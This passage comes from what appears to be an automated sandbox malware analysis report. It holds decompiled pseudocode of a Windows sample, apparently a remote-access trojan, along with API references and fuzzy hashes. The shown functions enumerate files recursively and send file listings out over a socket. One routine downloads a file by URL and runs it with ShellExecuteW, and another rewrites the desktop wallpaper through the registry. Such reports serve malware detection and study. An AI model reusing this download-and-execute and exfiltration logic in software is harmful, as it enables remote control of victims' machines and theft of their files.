                    								E00401FD8();
                    								E00401F09();
                    								E00401F09();
                    								_t94 = 0;
                    								goto L17;
                    							}
                    						}
                    						FindClose(_t213);
                    						goto L6;
                    					}
                    					FindClose(_t213);
                    					E00401FD8();
                    					E00401F09();
                    					E00401F09();
                    					_t94 = 1;
                    					goto L17;
                    				} else {
                    					_t143 = 1;
                    					L6:
                    					E00401FD8();
                    					E00401F09();
                    					E00401F09();
                    					_t94 = _t143;
                    					L17:
                    					 *[fs:0x0] =  *((intOrPtr*)(_t217 - 0xc));
                    					return _t94;
                    				}
                    			}
























                    0x0040958c
                    0x00409591
                    0x00409596
                    0x0040959c
                    0x0040959f
                    0x004095a2
                    0x004095a8
                    0x004095b4
                    0x004095c2
                    0x004095de
                    0x004095e3
                    0x004095f2
                    0x0040960f
                    0x00409611
                    0x0040961a
                    0x00409622
                    0x00409628
                    0x00409628
                    0x0040962a
                    0x00409632
                    0x00409638
                    0x0040963a
                    0x00000000
                    0x00000000
                    0x00409640
                    0x00409643
                    0x00409646
                    0x0040966e
                    0x00409675
                    0x00409687
                    0x0040968e
                    0x00409690
                    0x004096a2
                    0x004096a8
                    0x004096a9
                    0x004096ab
                    0x004096cd
                    0x004096d5
                    0x004096e1
                    0x004096e9
                    0x004096ee
                    0x004096f7
                    0x004096fc
                    0x00409708
                    0x0040970f
                    0x0040971a
                    0x0040971a
                    0x004096ab
                    0x00409690
                    0x00409729
                    0x00409735
                    0x00409748
                    0x0040975f
                    0x00409764
                    0x00409774
                    0x00409777
                    0x00409830
                    0x00409833
                    0x00409838
                    0x00000000
                    0x0040977d
                    0x00409795
                    0x0040979d
                    0x004097a2
                    0x004097a5
                    0x004097cc
                    0x004097d0
                    0x004097d6
                    0x004097de
                    0x004097e3
                    0x004097ec
                    0x004097f7
                    0x004097fc
                    0x004097fe
                    0x0040982a
                    0x0040982e
                    0x0040982e
                    0x00000000
                    0x0040982e
                    0x00409803
                    0x0040980b
                    0x00409813
                    0x0040981b
                    0x00409820
                    0x00000000
                    0x00409820
                    0x00409777
                    0x00409649
                    0x00000000
                    0x00409649
                    0x00409841
                    0x0040984a
                    0x00409852
                    0x0040985a
                    0x0040985f
                    0x00000000
                    0x00409624
                    0x00409624
                    0x0040964f
                    0x00409652
                    0x0040965a
                    0x00409662
                    0x00409667
                    0x00409861
                    0x00409864
                    0x00409871
                    0x00409871

                    APIs
                    • __EH_prolog.LIBCMT ref: 00409591
                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 00409609
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00409632
                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409649
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstH_prologNext
                    • String ID:
                    • API String ID: 1157919129-0
                    • Opcode ID: a0bcd82421991f2303a20eabff092c1a3e8cfa09a760854e407c40c7301d22c6
                    • Instruction ID: 7729d232af1ec1677a13d3e2e8f0f13ec78ee97731394ac1a415be00529050c1
                    • Opcode Fuzzy Hash: a0bcd82421991f2303a20eabff092c1a3e8cfa09a760854e407c40c7301d22c6
                    • Instruction Fuzzy Hash: 23813B328001199BCB15EBA1DC969EEB778AF14308F10417FE506B71E2EF789E49CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E00408733(void* __ecx, void* __edx, void* __eflags) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t62;
                    				void* _t78;
                    				void* _t88;
                    				void* _t89;
                    				void* _t97;
                    				void* _t99;
                    				void* _t111;
                    				void* _t114;
                    				void* _t118;
                    				void* _t120;
                    				void* _t167;
                    				void* _t169;
                    				void* _t170;
                    				void* _t172;
                    				void* _t174;
                    				intOrPtr _t175;
                    				void* _t176;
                    				void* _t177;
                    				void* _t179;
                    				void* _t180;
                    				void* _t181;
                    				void* _t182;
                    				void* _t183;
                    				void* _t184;
                    				void* _t185;
                    
                    				_t165 = __edx;
                    				_t120 = __ecx;
                    				E00457438(E00457809, _t172);
                    				_t175 = _t174 - 0x2b0;
                    				_push(_t169);
                    				_push(_t167);
                    				 *((intOrPtr*)(_t172 - 0x10)) = _t175;
                    				_t118 = _t120;
                    				E004020DF(_t118, _t172 - 0x4c);
                    				 *(_t172 - 0x18) =  *(_t172 - 0x18) | 0xffffffff;
                    				if(_t118 != 0) {
                    					_t165 = 0x46b928;
                    					_t111 = E004076ED(0x46b928);
                    					_t188 = _t111;
                    					if(_t111 != 0) {
                    						_t185 = _t175 - 0x18;
                    						E00408F83(_t118, _t185, 0x46b928, _t188, _t172 + 8);
                    						_t114 = E0041AEC7(_t118, _t172 - 0x34, 0x46b928, _t172);
                    						_t175 = _t185 + 0x18;
                    						E00401F13(_t172 + 0x20, _t165, _t169, _t114);
                    						E00401F09();
                    					}
                    				}
                    				_t176 = _t175 - 0x18;
                    				E00408F83(_t118, _t176, _t165, _t188, _t172 + 8);
                    				_t62 = E0041AF02(_t118, _t172 - 0x34, _t165, _t172);
                    				_t177 = _t176 + 0x18;
                    				E0040325D(_t62);
                    				E00401F09();
                    				L00408F79(_t118, _t172 + 8, _t167, _t172, "\\");
                    				 *(_t172 - 4) =  *(_t172 - 4) & 0x00000000;
                    				_t166 = _t172 + 8;
                    				_t170 = FindFirstFileW(E00401F04(E00409082(_t172 - 0x34, _t172 + 8, _t172, "*")), _t172 - 0x2b4);
                    				 *(_t172 - 0x18) = _t170;
                    				E00401F09();
                    				if(_t170 == 0xffffffff) {
                    					 *((intOrPtr*)(_t172 - 0x1c)) = 2;
                    					E00438B36(_t172 - 0x1c, 0x46dd30);
                    				}
                    				while(FindNextFileW(_t170, _t172 - 0x2b4) != 0) {
                    					if( *0x471b18 != 0) {
                    						E00401FD8();
                    						E00401F09();
                    						E00401F09();
                    						E00401FD8();
                    						_t78 = 0;
                    						__eflags = 0;
                    						L15:
                    						 *[fs:0x0] =  *((intOrPtr*)(_t172 - 0xc));
                    						return _t78;
                    					}
                    					if(( *(_t172 - 0x2b4) & 0x00000010) == 0) {
                    						_t179 = _t177 - 0x18;
                    						E004020F6(_t118, _t179, _t166, __eflags, _t172 + 0x38);
                    						_t180 = _t179 - 0x18;
                    						E00408F83(_t118, _t180, _t166, __eflags, _t172 + 0x20);
                    						_t88 = E0040417E(_t118, _t172 - 0x34, _t166, _t172, _t172 - 0x288);
                    						_t166 = _t172 + 8;
                    						_t89 = E004090E7(_t118, _t172 - 0x64, _t172 + 8, _t172, __eflags, _t88);
                    						_t181 = _t180 - 0x14;
                    						E00403262(_t118, _t181, _t172, __eflags, _t89);
                    						E004089AC(_t118, _t172 + 8, _t167);
                    						_t177 = _t181 + 0x48;
                    						E00401F09();
                    						L11:
                    						E00401F09();
                    						continue;
                    					}
                    					if(E0043F32F(_t172 - 0x288, _t172 - 0x288, 0x465510) == 0) {
                    						continue;
                    					}
                    					_t97 = E0043F32F(_t172 - 0x288, _t172 - 0x288, L"..");
                    					_t194 = _t97;
                    					if(_t97 == 0) {
                    						continue;
                    					}
                    					_t99 = E0040417E(_t118, _t172 - 0x64, _t166, _t172, _t172 - 0x288);
                    					_t166 = _t172 + 8;
                    					E004090E7(_t118, _t172 - 0x34, _t172 + 8, _t172, _t194, _t99);
                    					E00401F09();
                    					_t182 = _t177 - 0x18;
                    					E004020F6(_t118, _t182, _t172 + 8, _t194, _t172 + 0x38);
                    					_t183 = _t182 - 0x18;
                    					E00408F83(_t118, _t183, _t172 + 8, _t194, _t172 + 0x20);
                    					_t184 = _t183 - 0x18;
                    					E00408F83(_t118, _t184, _t166, _t194, _t172 - 0x34);
                    					E00408733(_t118, _t166, _t194);
                    					_t177 = _t184 + 0x48;
                    					goto L11;
                    				}
                    				 *(_t172 - 4) =  *(_t172 - 4) | 0xffffffff;
                    				FindClose(_t170);
                    				E00401FD8();
                    				E00401F09();
                    				E00401F09();
                    				E00401FD8();
                    				_t78 = 1;
                    				goto L15;
                    			}































                    0x00408733
                    0x00408733
                    0x00408738
                    0x0040873d
                    0x00408744
                    0x00408745
                    0x00408746
                    0x00408749
                    0x0040874e
                    0x00408753
                    0x00408759
                    0x0040875b
                    0x00408763
                    0x00408768
                    0x0040876a
                    0x0040876c
                    0x00408775
                    0x0040877d
                    0x00408782
                    0x00408789
                    0x00408791
                    0x00408791
                    0x0040876a
                    0x00408796
                    0x0040879f
                    0x004087a7
                    0x004087ac
                    0x004087b3
                    0x004087bb
                    0x004087c8
                    0x004087cd
                    0x004087dd
                    0x004087f7
                    0x004087f9
                    0x004087ff
                    0x00408807
                    0x00408809
                    0x00408819
                    0x00408819
                    0x0040881e
                    0x0040883b
                    0x0040897c
                    0x00408984
                    0x0040898c
                    0x00408994
                    0x00408999
                    0x00408999
                    0x0040899b
                    0x0040899e
                    0x004089ab
                    0x004089ab
                    0x00408848
                    0x004088e1
                    0x004088ea
                    0x004088ef
                    0x004088f8
                    0x00408907
                    0x0040890d
                    0x00408913
                    0x00408918
                    0x0040891e
                    0x00408925
                    0x0040892a
                    0x00408930
                    0x004088d4
                    0x004088d7
                    0x00000000
                    0x004088d7
                    0x00408863
                    0x00000000
                    0x00000000
                    0x00408871
                    0x00408878
                    0x0040887a
                    0x00000000
                    0x00000000
                    0x00408886
                    0x0040888c
                    0x00408892
                    0x0040889b
                    0x004088a0
                    0x004088a9
                    0x004088ae
                    0x004088b7
                    0x004088bc
                    0x004088c5
                    0x004088cc
                    0x004088d1
                    0x00000000
                    0x004088d1
                    0x00408937
                    0x0040893c
                    0x00408945
                    0x0040894d
                    0x00408955
                    0x0040895d
                    0x00408962
                    0x00000000

                    APIs
                    • __EH_prolog.LIBCMT ref: 00408738
                    • FindFirstFileW.KERNEL32(00000000,?,004655F0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004087F1
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00408819
                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408826
                    • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893C
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                    • String ID:
                    • API String ID: 1771804793-0
                    • Opcode ID: 3ae9b100fb5a9ad35eda093871794cee4047f538dd8a32aeba228ec08dcf5175
                    • Instruction ID: 9c3e71f398f729268d181d49f4c853ee0b3aba2965b1202f59572778dffe3103
                    • Opcode Fuzzy Hash: 3ae9b100fb5a9ad35eda093871794cee4047f538dd8a32aeba228ec08dcf5175
                    • Instruction Fuzzy Hash: B7515172900209AACB04FB65DD569ED7769AF10308F50417FB946B31E2FF389B488B99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E00406DD7(short* __edx, void* __eflags, intOrPtr _a4, char _a8) {
                    				char _v28;
                    				char _v44;
                    				char _v60;
                    				char _v64;
                    				char _v68;
                    				char _v72;
                    				char _v76;
                    				char _v84;
                    				void* _v104;
                    				void* __ebx;
                    				void* __ebp;
                    				intOrPtr* _t33;
                    				void* _t50;
                    				signed char _t54;
                    				intOrPtr* _t57;
                    				void* _t59;
                    				void* _t63;
                    				void* _t70;
                    				void* _t72;
                    				void* _t77;
                    				intOrPtr* _t79;
                    				short* _t83;
                    				void* _t84;
                    				void* _t85;
                    				void* _t87;
                    				void* _t105;
                    				void* _t119;
                    				void* _t143;
                    				void* _t147;
                    				void* _t154;
                    				signed int _t155;
                    				void* _t158;
                    				void* _t159;
                    				void* _t160;
                    				void* _t162;
                    				void* _t166;
                    
                    				_t166 = __eflags;
                    				_t138 = __edx;
                    				_t33 = E00401FAB( &_a8);
                    				_push(0xffffffff);
                    				_t87 = 4;
                    				_push(_t87);
                    				_push( &_v28);
                    				E004041A2( &_a8);
                    				_t158 = (_t155 & 0xfffffff8) - 0x2c;
                    				E004020F6(_t87, _t158, __edx, _t166, 0x473ec8);
                    				_t159 = _t158 - 0x18;
                    				E004020F6(_t87, _t159, __edx, _t166,  &_v44);
                    				E0041B8B0( &_v84, __edx);
                    				_t160 = _t159 + 0x30;
                    				_t147 =  *_t33 - _t87;
                    				if(_t147 == 0) {
                    					_t143 = 0;
                    					E00401E65( &_v64, __edx, _t154, __eflags, 0);
                    					__eflags = E00405B05("F");
                    					if(__eflags == 0) {
                    						E00401E65( &_v68, "F", _t154, __eflags, 0);
                    						_t138 = "M";
                    						__eflags = E00405B05("M");
                    						if(__eflags == 0) {
                    							L23:
                    							E00401E8D( &_v64, _t138);
                    							E00401FD8();
                    							E00401FD8();
                    							return 0;
                    						}
                    						_v68 = 0;
                    						_t50 = E00401FAB(E00401E65( &_v64, "M", _t154, __eflags, _t87));
                    						_t138 =  &_v76;
                    						__eflags = E0041B48B(_t50,  &_v76,  &_v68);
                    						if(__eflags == 0) {
                    							_t105 = _t160 - 0x18;
                    							_push("2");
                    							L22:
                    							E00402093(_t87, _t105, _t138, _t154);
                    							_push(0xb3);
                    							E00404AA1(_a4, _t138, __eflags);
                    							goto L23;
                    						}
                    						_t138 = _v72;
                    						_t54 = E00417FFD(0x471b38);
                    						L0043B710(_v72);
                    						_t162 = _t160 - 0x18;
                    						__eflags = (_t54 & 0x000000ff) - 1;
                    						L9:
                    						_t105 = _t162;
                    						if(__eflags != 0) {
                    							_push("3");
                    						} else {
                    							_push("1");
                    						}
                    						goto L22;
                    					}
                    					_t57 = E00401FAB(E00401E65( &_v68, "F", _t154, __eflags, 2));
                    					_t59 = E00401FAB(E00401E65( &_v68, "F", _t154, __eflags, 3));
                    					_t138 =  *_t57;
                    					E0040D83D( &_v60,  *_t57, _t59);
                    					_t63 = E00401FAB(E00401E65( &_v72,  *_t57, _t154, __eflags, _t87));
                    					__imp__URLDownloadToFileW(0, _t63, E00401F04( &_v60), 0, 0);
                    					__eflags = _t63;
                    					if(__eflags == 0) {
                    						L4:
                    						if( *((char*)(E00401FAB(E00401E65( &_v84, _t138, _t154, _t170, 1)))) == 0) {
                    							_t119 = _t160 - 0x18;
                    							_push("0");
                    						} else {
                    							_t70 = ShellExecuteW(_t143, L"open", E00401F04( &_v72), _t143, _t143, 1);
                    							_t119 = _t160 - 0x18;
                    							_t172 = _t70 - 0x20;
                    							if(_t70 > 0x20) {
                    								_push("1");
                    							} else {
                    								_push("3");
                    							}
                    						}
                    						L17:
                    						E00402093(_t87, _t119, _t138, _t154);
                    						_push(0xb3);
                    						E00404AA1(_a4, _t138, _t172);
                    						E00401F09();
                    						goto L23;
                    					}
                    					L14:
                    					_t119 = _t160 - 0x18;
                    					_push("2");
                    					goto L17;
                    				}
                    				_t168 = _t147 != 1;
                    				if(_t147 != 1) {
                    					goto L23;
                    				}
                    				_t143 = 0;
                    				E00401E65( &_v64, __edx, _t154, _t168, 0);
                    				_t72 = E00405B05("F");
                    				_t169 = _t72;
                    				if(_t72 == 0) {
                    					E00401E65( &_v68, "F", _t154, __eflags, 0);
                    					_t138 = "M";
                    					__eflags = E00405B05("M");
                    					if(__eflags == 0) {
                    						goto L23;
                    					} else {
                    						_t138 = E00401FAB(E00401E65( &_v64, "M", _t154, __eflags, _t87));
                    						_t77 = E00417FFD(0x471b38);
                    						_t162 = _t160 - 0x18;
                    						__eflags = _t77 - 1;
                    						goto L9;
                    					}
                    				}
                    				_t79 = E00401FAB(E00401E65( &_v68, "F", _t154, _t169, 2));
                    				E0040D83D( &_v60,  *_t79, E00401FAB(E00401E65( &_v68, "F", _t154, _t169, 3)));
                    				_t83 = E00401F04( &_v60);
                    				_t84 = E00401E65( &_v72,  *_t79, _t154, _t169, _t87);
                    				_t138 = _t83;
                    				_t85 = E0041BF87(_t84, _t83);
                    				_t170 = _t85 - 1;
                    				if(_t85 != 1) {
                    					goto L14;
                    				}
                    				goto L4;
                    			}







































                    0x00406dd7
                    0x00406dd7
                    0x00406de6
                    0x00406deb
                    0x00406def
                    0x00406df5
                    0x00406dfa
                    0x00406dfb
                    0x00406e00
                    0x00406e0a
                    0x00406e0f
                    0x00406e19
                    0x00406e22
                    0x00406e27
                    0x00406e2a
                    0x00406e2c
                    0x00406f55
                    0x00406f5c
                    0x00406f71
                    0x00406f73
                    0x00407013
                    0x00407018
                    0x00407024
                    0x00407026
                    0x00407094
                    0x00407098
                    0x004070a1
                    0x004070a9
                    0x004070b6
                    0x004070b6
                    0x0040702c
                    0x0040703d
                    0x00407042
                    0x0040704e
                    0x00407050
                    0x0040707b
                    0x0040707d
                    0x00407082
                    0x00407082
                    0x0040708a
                    0x0040708f
                    0x00000000
                    0x0040708f
                    0x00407052
                    0x0040705b
                    0x00407067
                    0x0040706d
                    0x00407070
                    0x00406f3d
                    0x00406f3d
                    0x00406f3f
                    0x00406f4b
                    0x00406f41
                    0x00406f41
                    0x00406f41
                    0x00000000
                    0x00406f3f
                    0x00406f82
                    0x00406f96
                    0x00406f9b
                    0x00406fa2
                    0x00406fc0
                    0x00406fc7
                    0x00406fcd
                    0x00406fcf
                    0x00406eb4
                    0x00406ec9
                    0x00406feb
                    0x00406fed
                    0x00406ecf
                    0x00406ee3
                    0x00406eec
                    0x00406eee
                    0x00406ef1
                    0x00406fe1
                    0x00406ef7
                    0x00406ef7
                    0x00406ef7
                    0x00406ef1
                    0x00406ff2
                    0x00406ff2
                    0x00406ffa
                    0x00406fff
                    0x00407008
                    0x00000000
                    0x00407008
                    0x00406fd5
                    0x00406fd8
                    0x00406fda
                    0x00000000
                    0x00406fda
                    0x00406e32
                    0x00406e35
                    0x00000000
                    0x00000000
                    0x00406e3b
                    0x00406e42
                    0x00406e4e
                    0x00406e57
                    0x00406e59
                    0x00406f02
                    0x00406f07
                    0x00406f13
                    0x00406f15
                    0x00000000
                    0x00406f1b
                    0x00406f2c
                    0x00406f33
                    0x00406f38
                    0x00406f3b
                    0x00000000
                    0x00406f3b
                    0x00406f15
                    0x00406e68
                    0x00406e88
                    0x00406e92
                    0x00406e9e
                    0x00406ea3
                    0x00406ea7
                    0x00406eac
                    0x00406eae
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406EE3
                    • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: DownloadExecuteFileShell
                    • String ID: C:\Users\user\Desktop\BiU282bjyR.exe$open
                    • API String ID: 2825088817-1519992000
                    • Opcode ID: 001ec24a1c9af67b2fa23aba76015272714f2f2ed01b0f05ab311603a54a07b5
                    • Instruction ID: c8251153fb7a3308a89fab2637489bca27fcffa35ee6f4995442d0cb51360427
                    • Opcode Fuzzy Hash: 001ec24a1c9af67b2fa23aba76015272714f2f2ed01b0f05ab311603a54a07b5
                    • Instruction Fuzzy Hash: 5A61A131B0830156CA14FB76C866ABE37A59F81748F40493FF942772D2EE3C9909869B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E00407763(void* __edx, char _a4) {
                    				void* _v16;
                    				struct _WIN32_FIND_DATAW _v596;
                    				char _v620;
                    				void* _v632;
                    				char _v644;
                    				void* _v648;
                    				char _v652;
                    				void* _v656;
                    				char _v668;
                    				char _v676;
                    				void* _v700;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t24;
                    				int _t28;
                    				void* _t33;
                    				void* _t48;
                    				void* _t70;
                    				void* _t72;
                    				void* _t73;
                    				void* _t75;
                    				void* _t77;
                    
                    				_t70 = __edx;
                    				_t24 = FindFirstFileW(E00401F04( &_a4),  &_v596);
                    				_t72 = _t24;
                    				_t78 = _t72 - 0xffffffff;
                    				if(_t72 != 0xffffffff) {
                    					E004020DF(_t48,  &_v668);
                    					E0040417E(_t48,  &_v644, _t70, _t73,  &(_v596.cFileName));
                    					_t71 = 0x465510;
                    					_t28 = E004076DE(__eflags);
                    					_t49 = _t28;
                    					E00401F09();
                    					__eflags = _t28;
                    					if(__eflags != 0) {
                    						E00401FE2( &_v676, 0x465510, _t72, E004020B7(_t49,  &_v644, 0x465510, 0x250, __eflags,  &_v596, 0x250));
                    						L6:
                    						E00401FD8();
                    					}
                    					__eflags = FindNextFileW(_t72,  &_v596);
                    					if(__eflags != 0) {
                    						_t33 = E004020B7(_t49,  &_v620, _t71, 0x250, __eflags,  &_v596, 0x250);
                    						_t71 =  &_v676;
                    						E00401FE2( &_v676,  &_v676, _t72, E00406362(_t49,  &_v652,  &_v676, 0x250, __eflags, _t33));
                    						E00401FD8();
                    						goto L6;
                    					}
                    					E004020F6(_t49, _t75 - 0x18, _t71, __eflags,  &_v668);
                    					_push(0x50);
                    					E00404AA1(0x474040, _t71, __eflags);
                    					E00401FD8();
                    				} else {
                    					_t77 = _t75 - 0x18;
                    					asm("in al, dx");
                    					asm("sbb [ebp+0x2c82494], cl");
                    					 *_t24 = _t24 +  *_t24;
                    					E0041B7B3(_t48, _t77, _t70);
                    					_push(0x54);
                    					E00404AA1(0x474040, _t70, _t78);
                    				}
                    				return E00401F09();
                    			}


























                    0x00407763
                    0x0040777e
                    0x00407784
                    0x00407786
                    0x00407789
                    0x004077b1
                    0x004077c2
                    0x004077c7
                    0x004077ce
                    0x004077d7
                    0x004077d9
                    0x004077e3
                    0x004077e5
                    0x004077fb
                    0x0040783b
                    0x0040783b
                    0x0040783b
                    0x0040784c
                    0x0040784e
                    0x00407810
                    0x00407816
                    0x00407829
                    0x00407832
                    0x00000000
                    0x00407837
                    0x0040785a
                    0x0040785f
                    0x00407866
                    0x0040786f
                    0x0040778b
                    0x0040778b
                    0x0040778c
                    0x0040778d
                    0x00407793
                    0x00407797
                    0x0040779c
                    0x004077a3
                    0x004077a3
                    0x00407889

                    APIs
                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040777E
                    • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407846
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileFind$FirstNextsend
                    • String ID: @@G$@@G
                    • API String ID: 4113138495-2078739117
                    • Opcode ID: 49b0edf1174fd18d28d1e26bd7e2f69f553117b9ca6302147980c59a11022c2a
                    • Instruction ID: e9f8f0bc503263752f7a8e1f2310068b09a747e7583bc38278f6ef910674a1b2
                    • Opcode Fuzzy Hash: 49b0edf1174fd18d28d1e26bd7e2f69f553117b9ca6302147980c59a11022c2a
                    • Instruction Fuzzy Hash: DC2144315082015BC314FB61D895DAFB7A8AF90358F40493EF696621E1EF38AA49C65B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 27%
                    			E0041C477(void* __ecx, void* __edx) {
                    				void* __ebx;
                    				char* _t10;
                    				void* _t12;
                    				void* _t14;
                    				void* _t15;
                    				void* _t16;
                    				void* _t17;
                    				void* _t18;
                    				void* _t24;
                    				void* _t26;
                    				void* _t27;
                    				void* _t28;
                    				void* _t32;
                    				void* _t34;
                    
                    				_t21 = __edx;
                    				_t24 = __edx;
                    				_t12 = __ecx;
                    				if(_t12 == 0) {
                    					_push(1);
                    					_t28 = _t27 - 0x18;
                    					_t10 = "0";
                    					E00402093(_t10, _t28, __edx, _t26, _t10);
                    					_t25 = "Control Panel\\Desktop";
                    					_push("WallpaperStyle");
                    					_t22 = "Control Panel\\Desktop";
                    					E0041331D(_t28, "Control Panel\\Desktop");
                    					_push(1);
                    					_t14 = _t28 + 0x20 - 0x18;
                    					_push(_t10);
                    					goto L11;
                    				} else {
                    					_t15 = _t12 - 1;
                    					if(_t15 == 0) {
                    						_push(1);
                    						_t32 = _t27 - 0x18;
                    						_t16 = _t32;
                    						_push("2");
                    						goto L7;
                    					} else {
                    						_t17 = _t15 - 1;
                    						if(_t17 == 0) {
                    							_push(1);
                    							_t32 = _t27 - 0x18;
                    							_t16 = _t32;
                    							_push("10");
                    							goto L7;
                    						} else {
                    							_t18 = _t17 - 1;
                    							if(_t18 == 0) {
                    								_push(1);
                    								_t32 = _t27 - 0x18;
                    								_t16 = _t32;
                    								_push("6");
                    								L7:
                    								E00402093(_t10, _t16, _t21, _t26);
                    								_t25 = "Control Panel\\Desktop";
                    								_push("WallpaperStyle");
                    								_t22 = "Control Panel\\Desktop";
                    								E0041331D(_t16, "Control Panel\\Desktop");
                    								_push(1);
                    								_t14 = _t32 + 0x20 - 0x18;
                    								_push("0");
                    								goto L11;
                    							} else {
                    								if(_t18 == 1) {
                    									_push(1);
                    									_t34 = _t27 - 0x18;
                    									E00402093(_t10, _t34, __edx, _t26, "0");
                    									_t25 = "Control Panel\\Desktop";
                    									_push("WallpaperStyle");
                    									_t22 = "Control Panel\\Desktop";
                    									E0041331D(_t34, "Control Panel\\Desktop");
                    									_push(1);
                    									_t14 = _t34 + 0x20 - 0x18;
                    									_push("1");
                    									L11:
                    									E00402093(_t10, _t14, _t22, _t26);
                    									E0041331D(_t14, _t25);
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return SystemParametersInfoW(0x14, 0, _t24, 3);
                    			}

















                    0x0041c477
                    0x0041c47a
                    0x0041c47c
                    0x0041c47f
                    0x0041c523
                    0x0041c525
                    0x0041c528
                    0x0041c530
                    0x0041c535
                    0x0041c53a
                    0x0041c53f
                    0x0041c541
                    0x0041c549
                    0x0041c54e
                    0x0041c550
                    0x00000000
                    0x0041c485
                    0x0041c485
                    0x0041c488
                    0x0041c515
                    0x0041c517
                    0x0041c51a
                    0x0041c51c
                    0x00000000
                    0x0041c48e
                    0x0041c48e
                    0x0041c491
                    0x0041c507
                    0x0041c509
                    0x0041c50c
                    0x0041c50e
                    0x00000000
                    0x0041c493
                    0x0041c493
                    0x0041c496
                    0x0041c4d4
                    0x0041c4d6
                    0x0041c4d9
                    0x0041c4db
                    0x0041c4e0
                    0x0041c4e0
                    0x0041c4e5
                    0x0041c4ea
                    0x0041c4ef
                    0x0041c4f1
                    0x0041c4f9
                    0x0041c4fe
                    0x0041c500
                    0x00000000
                    0x0041c498
                    0x0041c49b
                    0x0041c4a1
                    0x0041c4a3
                    0x0041c4ad
                    0x0041c4b2
                    0x0041c4b7
                    0x0041c4bc
                    0x0041c4be
                    0x0041c4c6
                    0x0041c4cb
                    0x0041c4cd
                    0x0041c551
                    0x0041c551
                    0x0041c55d
                    0x0041c562
                    0x0041c49b
                    0x0041c496
                    0x0041c491
                    0x0041c488
                    0x0041c575

                    APIs
                    • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041C56C
                      • Part of subcall function 0041331D: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041332C
                      • Part of subcall function 0041331D: RegSetValueExA.KERNEL32(?,004664A0,00000000,?,00000000,00000000,004742D8,?,?,0040F65C,004664A0,4.8.0 Pro), ref: 00413354
                      • Part of subcall function 0041331D: RegCloseKey.ADVAPI32(?,?,?,0040F65C,004664A0,4.8.0 Pro), ref: 0041335F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateInfoParametersSystemValue
                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                    • API String ID: 4127273184-3576401099
                    • Opcode ID: 77f7e0c17d7174778f9faecdcd6c78b00245cc7894719fe057abaf6e4b86e128
                    • Instruction ID: bd65ab499af08249556860e3ddcfdd7b47e92fe020771dfec090c1e956b8d0d5
